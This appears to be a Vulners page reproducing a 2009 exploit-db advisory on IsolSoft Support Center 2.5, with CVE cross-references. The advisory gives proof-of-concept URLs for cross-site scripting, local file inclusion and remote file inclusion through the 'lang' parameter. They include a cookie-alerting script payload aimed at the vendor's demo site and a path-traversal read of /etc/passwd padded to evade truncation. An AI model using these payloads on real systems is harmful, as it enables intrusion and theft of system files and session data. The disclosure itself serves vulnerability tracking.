Lucene search
+L

IsolSoft Support Center 2.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

🗓️ 07 Aug 2009 00:00:00Reported by MoudiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 45 Views

Multiple vulnerabilities in IsolSoft Support Center 2.5 allow Remote File Inclusion and Cross-Site Scripting.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4541
7 Aug 200900:00
circl
circl
Circl
CVE-2009-4542
7 Aug 200900:00
circl
cve
CVE
CVE-2009-4541
4 Jan 201017:00
cve
cve
CVE
CVE-2009-4542
4 Jan 201017:00
cve
cvelist
Cvelist
CVE-2009-4541
4 Jan 201017:00
cvelist
cvelist
Cvelist
CVE-2009-4542
4 Jan 201017:00
cvelist
euvd
EUVD
EUVD-2009-4507
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2009-4508
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-4541
4 Jan 201017:30
nvd
nvd
NVD
CVE-2009-4542
4 Jan 201017:30
nvd
Rows per page
/*

              _____       _ ___        __
             | ____|_   _(_) \ \      / /_ _ _   _
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/
                                    _____
                                   |_   _|__  __ _ _ __ ___
                                      | |/ _ \/ _` | '_ ` _ \
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Contact : <[email protected]>
Download : http://www.isolsoft.com/

Greetings : Mizoz, Zuka, str0ke, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in newticket (lang).

- Poc:
  http://127.0.0.1/newticket.php?lang=[XSS]
  http://www.isolsoft.com/demo/newticket.php?lang="><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[LFI]
  http://127.0.0.1/newticket.php?lang=[LFI]
  http://127.0.0.1/rempass.php?lang=[LFI]
  http://www.isolsoft.com/demo/index.php?adduser=true&lang=[LFI]
  http://www.isolsoft.com/demo/newticket.php?lang=[LFI]
  http://www.isolsoft.com/demo/rempass.php?lang=[LFI]

LFI => ../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..

[+] Exploit RFI:

- Vulnerable code in index.php (lang).
- Vulnerable code in newticket.php (lang).
- Vulnerable code in rempass.php (lang).

- Poc:
  http://127.0.0.1/index.php?adduser=true&lang=[RFI]
  http://127.0.0.1/newticket.php?lang=[RFI]
  http://127.0.0.1/rempass.php?lang=[RFI]

# milw0rm.com [2009-08-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Aug 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.07743
45